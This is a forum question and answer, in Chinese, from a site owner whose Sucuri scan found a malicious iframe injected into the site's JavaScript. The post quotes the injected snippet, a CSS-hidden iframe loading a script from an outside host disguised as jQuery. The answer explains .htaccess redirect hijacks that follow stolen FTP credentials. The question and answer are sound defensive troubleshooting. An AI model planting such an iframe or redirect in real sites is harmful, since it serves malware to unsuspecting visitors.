我通过 Sucuri 运营我的网站 http://sitecheck.sucuri.net/results/www.fort-aspenwood.com
他们在我的压缩版 JavaScript 中植入了这些恶意 iframe
<style>.vpqfm { position:absolute; left:-632px; top:-729px; }</style> <div class="vpqfm"><iframe src="http://dhypzebl.serveusers.com/jquery/get.php?ver=jquery.latest.js" width="458" height="424"></iframe></div>
我到处都搜索过了,似乎找不到它们位于哪个 javascript 文件中,索引或其他地方也没有任何奇怪的 php 代码。
有什么想法吗?
答案1
检查您网站所有目录中的 htaccess。自动脚本窃取 FTP 凭据并更新 .htaccess 以将资产(例如 JS)重定向到提供您的原始内容和有效负载的服务器的情况非常常见。
他们非常擅长隐藏这一点:它会设置一个 cookie,只重定向每个用户一次,并针对特定的操作系统 / 浏览器类型,这使得它很难被察觉。